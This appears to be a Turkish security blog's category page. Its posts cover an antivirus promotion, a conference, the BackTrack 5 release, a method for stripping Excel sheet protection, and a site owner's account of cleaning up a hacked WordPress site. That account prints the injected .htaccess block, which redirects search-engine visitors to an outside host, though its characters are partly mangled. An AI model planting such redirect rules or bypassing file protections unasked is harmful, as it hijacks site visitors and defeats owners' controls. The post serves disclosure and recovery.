Güvenlik
Sistem güvenliği, antivirüs,virüs,saldırı,hack,açıklar, network güvennliği gibi konulardaki yayınlar
Trend Micro Maksimum Security 3 Aylık Ücretsiz Kullanmak
22 Tem
Tatilde olmam sebebiyle bir süredir sizlere yeni yazılar yazamıyordum. Gelir gelmez sizler için faydalı olacağını düşündüğüm bir kampanya yazısı yazarak merhaba demek istedim.
Trend Micro Türkiye’nin Facebook üzerinden başlatmış olduğu kampanya kapsamında aşağıdaki işlemleri yapan her kişiye ücretsiz 3 aylık Trend Micro Maximum Security ürününü kullanma fırsatı tanıyor.
Nasıl kazanacaksınız?
Yapmanız gereken Trend Micro Facebook Fan sayfasına girmek ve beğen tuşuna basmak. “Welcome” tabı içerisinde sizden adınızı, soyadınızı, e-postanızı ve yaşınızı soran ufak bir form karşınıza gelecek. Forumu doldurup göndere bastığınız zaman size özel 3 aylık Trend Micro Maximum Security ürününün indirme linkini içeren bir e-posta gönderiliyor.
Neden Trend Micro?
Son dönemde gerçekten kendisini geliştirerek oldukça başarılı bir antivirüs yazılımı üretmeye başlayan ve her seviyedeki kullanıcıların rahatlıkla anlayıp kullanabileceği bir ürün üretmeleri en büyük etken, Bunun yanı sıra Trend Micro Tester’ı olmama sebebiyle piyasaya çıkmayan sürümlerini deneme fırsatı bulduğum için diğer antivirüs yazılımlarıyla karşılaştırma şansım oldu. Bu süre zarfında Beta olmasına rağmen oldukça başarılı ve sistemi gereksiz yere yormayan bir yazılıma sahip olmak istiyorsanız kesinlikle tavsiye edeceğim bir Güvenlik yazılımıdır.
Trend Micro Türkiye Facebook Fan Sayfası: http://www.facebook.com/trendmicroturkey
Not: Size gönderilen e-postada bulunan link 24 saat için geçerli olup eğer 24 saat içerisinde indirmezseniz kampanyayı kaçırmış olacaksınız. Bu yüzden Yukarıda belirtilen işlemleri tamamlamız halinde 24 saati geçirmeden ürününüzü indirmeniz gerekmektedir.
6. Kamu Kurumları Bilgi Teknolojileri Güvenlik Konferansı
11 May
TÜBİTAK BİLGEM Ulusal Elektronik ve Kriptoloji Araştırma Enstitüsü (UEKAE) Bilişim Sistemleri Güvenliği Bölümü tarafından organize edilen Altıncı Kamu Kurumları Bilgi Teknolojileri Güvenlik Konferansı, 8 Haziran 2011 Çarşamba günü TÜBİTAK Feza Gürsey ve Mustafa İnan Konferans Salonları’nda düzenlenecektir.
Konferansın açılış konuşmasını UEKAE Müdür Yardımcısı Sn. Mert Üneri yapacaktır. Açılış konuşmasının ardından kürsüye TÜBİTAK Başkanı Sn. Prof. Dr. Nüket Yetiş ve Devlet Bakanı Sn. Prof. Dr. Mehmet Aydın çıkacaklardır.
Konuşmaların tamamlanmasının ardından konferans sunular ile devam edecektir. Saat 16:50’ye kadar sürecek olan konferansta iki paralel oturumda olmak üzere toplam 15 adet sunu yapılacaktır.
Sunularda;
Siber güvenlik tatbikatları, e-kimlik, DDoS saldırıları, botnetler, yapısal güvenlik testleri, bulut bilişim, bilgi sistem yöneticilerinin hukuki yükümlülükleri ve bilişim suçlarında trendler gibi güncel konular paylaşılacaktır.
Kurum dışından bilgi güvenliği uzmanlarının ve hukukçuların da konuşmacı olarak yer aldığı konferansın kurumların bilgi işlem, iç denetim ve strateji geliştirme birimleri yönetici ve çalışanları için faydalı olacağını değerlendiriyoruz.
Konferans programını buradan indirebilirsiniz.
Etkinlik ücretsizdir. Etkinliğe lütfen kayıt olunuz. Kayıt olmak için: konferans@uekae.tubitak.gov.tr adresine ad ve soyadınız ile çalıştığınız kurum adını içeren “KAYIT” konulu bir e-posta yollayınız.
Etkinlik aşağıdaki sayfadan canlı olarak yayınlanacaktır.
http://www.bilgiguvenligi.gov.tr/mms://mediasrv.ulakbim.gov.tr/konferans2011
Etkinliğin düzenleneceği TÜBİTAK Başkanlık Binası’nın krokisi
Backtrack 5 Yayınlandı!
11 May
Güvenlik testleri için özel olarak üretilen Linux dağıtımı olan Backtrack’ın yeni sürümü dün itibari ile yayınlandı. BackTrack 5 olarak piyasaya çıkan sürümün Ekran görüntüleri aşağıda yer almakta.
Yeni sürümü indirmek için http://www.backtrack-linux.org/downloads/ linkini ziyaret etmeniz yeterli olacaktır.
Excel’de Sayfa Korumalarını Hackleme
3 May
Excel bilindiği üzere en basit tabiri ile her türlü tablolama işlemi yapabildiğimiz bir uygulama aslında bir çok kompleks ve içerisinde bir çok özelliği bulunduran uygulamada aklınıza bile gelemeyecek uygulamalar oluşturabilmek mümkün.
Bugün bir arkadaşımın ihtiyacı olan bir Excel belgesinin bana yollaması ve sayfa korumalarını nasıl açabileceğimizi sorması ile yazmaya karar verdim bu yazının devamında Excel’de şifre ile korunmuş sayfaları nasıl açabileceğinizin cevabını bulacaksınız.
Öncelikle bu işlemleri yapabilmeniz için Bilgisayarınızda kurulu olan Office sürümünün 2007 ya da daha üst sürümü olması gerekmekte. Çünkü 2007 ile gelen yapısal değişilik sayesinde Office dökümanlarımızın içeriği XML olarak saklanmakta. XML de hem okunması hem veri taşınması hem de düzenlenebilirliği açısından kullanıcılara ve sistemlere büyük kolaylıklar sağlamakta. Bu bakımdan eğer Office 2007 öncesi bir süreme sahipseniz aşağıda anlatacağımız yol işinize yaramayacaktır.
- Öncelikle Elimizdeki dosyanın Office 2007 ve ya 2010 formatında yani uzantısının .xlsx olması gerekmekte eğer elinizdeki döküman xls formatında ise Office Excel 2007/2010 ile açarak öncelikle .xlsx olarak kaydediyoruz.
- Sonrasında dökümanımızın uzatntısını .zip olarak el ile değiştiriyoruz. Bunu yapabilmek için öncelikle bilinen dosya formatlarının görüntülenmesi gerekmekte bu ayarı da Bilgisayarımı tıkladıktan sonra Klasör seçeneklerinde Görünüm sekmesinde “Bilinen dosya uzantılarını gizle” onay kutusunun işaretini kaldırmanız gerekiyor. Bu işlemi yaptıktan sonra ise dökümanınızın adını değiştir diyerek sonunda var olan “.xlsx” i “.zip” olarak değiştiriyoruz. Ve artık dökümanımız sıkıştırılmış bir dosya görünümüne kavuşuyor. sadece görünümü değil elbette yapısı da aynı şekilde değişmiş oluyor.
- Şimdi yapacağımız işlem ise bu dizinleri açıp içinde var olan sheet.xml dosyalarının içeriklerini Metin Belgesi ile açmak oluyor. Eğer elinizde Notepad++ ya da Editplus gibi daha gelişmiş bir metin editörü mevcutsa XML içerisindeki verileri daha rahat düzenleyebilirsiniz.
- Şimdi XML olarak sheet1.xml, sheet2.xml şeklinde dökümanımızdaki sayfaların sayısı kadar sheet.xml dosyasıyla karşı karşıyayız Büyük ihtimalle dökümandaki tüm sayfalar korumalı olacağından bu aşamadıki işlemi tüm sheet.xml dosyalarında yapmanız gerekecektir. sheet.xml dosyasını açtığımızda xml kodlarını göreceğiz burada “<sheetProtection password=”CF38″ sheet=”1″ selectLockedCells=”1″/><protectedRanges>” kısımlarını bulup silmemiz gerekiyor.
- Bu işlemi tamamladıktan sonra yine uzantısı .zip olan dosya ile içindekileri değiştirerek sıkıştırılmış dizinimizi elde edeceğiz. Sonrasında ise işleme ilk başladığımız zaman ki gibi dosyamısın uzantısını “.zip”ten “.xlsx” haline getiriyoruz.
Ve böylece artık Excel dökümanımızın koruması kaldırılmış durumda bundan sonra dökümanımızdaki tüm sayfa ve hücrelere istediğiniz işlemi yapmanız mümkün.
“exgocgkctswo” .htaccess Hack ve Kurtulma Yolları
1 May
Evet bir kaç gündür bloguma ulaşmak isteyipte ulaşamayan arkadaşlar farketmiş olacaktır. İlk iki gün 503 hatası alınca server bazlı bir sorun olduğunu düşünerek hosting firmama ticket açtım ve bir süre cevap bekleyerek geçti ki gelen cevapta server konfigrasyonlarında bir sorunun olmadığı tema yada kurulu olan wordpress ile ilgili sorun olduğu konusunda bir geri dönüş olunca zamanın da darlığı ile öncelikle başladım ftp de dolaşmaya.
Birden farkettim ki abartısız her klasörün içinde var olan bir .htaccess dosyası var merak ettim ve içeriğine baktığımda da agent’ları hedef alan ve sonrasında siteyi yoran bir kod bloğuyla karşılaştım.
# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http)([^].)(google.yahoo.bing.msn.yandex.ask.excite.altavista.netscape.aol.hotbot.goto.infoseek.mamma.alltheweb.lycos.search.metacrawler.rambler.mail.dogpile.ya.search).$ [NC]
RewriteCond %{HTTP_REFERER} !^.(q=cache).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(bingAccoonaAcesExplorerAmfibiAmigasOSapacheappieAppleSyndication).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(ArchiveArgusAsksJeevesasteriasAtrenkosNewsBeOSBigBlogZoo).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Biz360BlaizBloglinesBlogPulseBlogSearchBlogsLiveBlogsSayblogWatcher).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(BookmarkbotCE-PreloadCFNetworkcococCombineCrawlcurlDangershiptop).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(DiagnosticsDTAAgentectoEmeraldShieldendoEvaalEverest-Vulcan).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(exactseekFeedFetchfindlinksFreeBSDFriendsterFucksYouGoogle).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(GregariusHatenaScreenshotheritrixHolyCowDudeHonda-SearchHP-UX).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(HTML2JPGHttpClienthttpunitichiroiGetteriPhoneIRIXJakartaJetBrains).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(KrugleLabradorlarbinLeechGetlibwwwLifereaLinkChecker).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(LinknSurfLinuxLiveJournalLonoponoLotus-NotesLycosLynxMac_PowerPC).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Mac_PPCMacs10MacsOSmacDNMacintoshMediapartnersMegiteMetaProducts).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(MivaMobileNetBSDNetNewsWireNetResearchServerNewsAlloyNewsFire).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(NewsGatorOnlineNewsMacProNokiaNuSearchNutchObjectSearchOctora).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(OmniExplorerOmnipelagosOnetOpenBSDOpenIntelligenceDataoreilly).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(os=MacP900ipanscientperlPlayStationPOE-ComponentPrivacyFinder).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(psycheclonePythonretrieverRojoRSSSBIderScooterSeekerSeriess60).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(SharpReaderSiteBarSlurpSnoopySoapsClientSocialmarksSpheresScout).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(spidersprooseRamblerStrawsubscriberSunOSSurferSyndic8).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(SyntryxTargetYourNewsTechnoratiThunderbirdTwicelerurllibValidator).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(ViennavoyagerW3CWavefirewebcollageWebmasterWebPatrolwgetWins9x).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(Win16Win95Win98Windowss95Windowss98WindowssCEWindowssNTs4).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(WinHTTPWinNT4WordPressWWWeaselwwwsteryacyYahoo).$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.(YandexYetiYouReadMeZhuaxiaZyBorg).$ [NC]
RewriteCond %{HTTP_COOKIE} !^.xccgtswgokoe.$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.)$ httptrialworld.netcgi-binr.cgip=10003&i=604add41&j=327&m=e8d794e1972216960f0b996ffedc1a32&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe1%{HTTP_HOST}100800HttpOnly]
# exgocgkctswo
Bu durumdan kurtulmak için öncelikle ftp’deki dosyalarımın tümünü bilgisayarıma indirdim. içinde yaklaşık 300′e yakın olan .htaccess dosyalarını temizledim bu arada bu noktada dikkat etmek gerekiyor .htaccess kullanan bir eklenti kullanıyor iseniz onuda silme ihtimalinize karşı öncelikle daha önce elinizde sağlam bir şekilde var olan bir yedeğinizin olması sizi olası sorunlardan koruyacaktır. Sonrasında ise wordpress’in kendi root dizinindeki .htaccess’de dahil olmak üzere tümünü kaldırdığınızdan emin iseniz FTP’deki dosyaları silerek bunları tekrar atmalısınız. Bu işlem bittiğinde aşağıdaki resimde de görüldüğü gibi sitenizi ilginç karakterlerle açılıyor görebilirsiniz. Endişelenmeyin.
Bu aşamada aklıma gelen ilk şey acaba wordpress’in dosyalarında da mı bir sıkıntı var diyerek temiz en son sürümü indirip dosyalarını tekrar ftp attım ama nafile. Birden Admin panelindeki Ayarlar menüsünde var olan “Kalıcı bağlantılar” ile .htaccess oluşturmak geldi aklımdan ve sorunda hallolmuş oldu böylece :) Bu arada Kalıcı bağlantılar menüsü altında ayarlarınızı resimdeki gibi yapmanız gerekmektedir.
Böylece bir kaç günlük aranın ardından daha sağlıklı bir şekilde kaldığımız yerden devam ediyoruz.
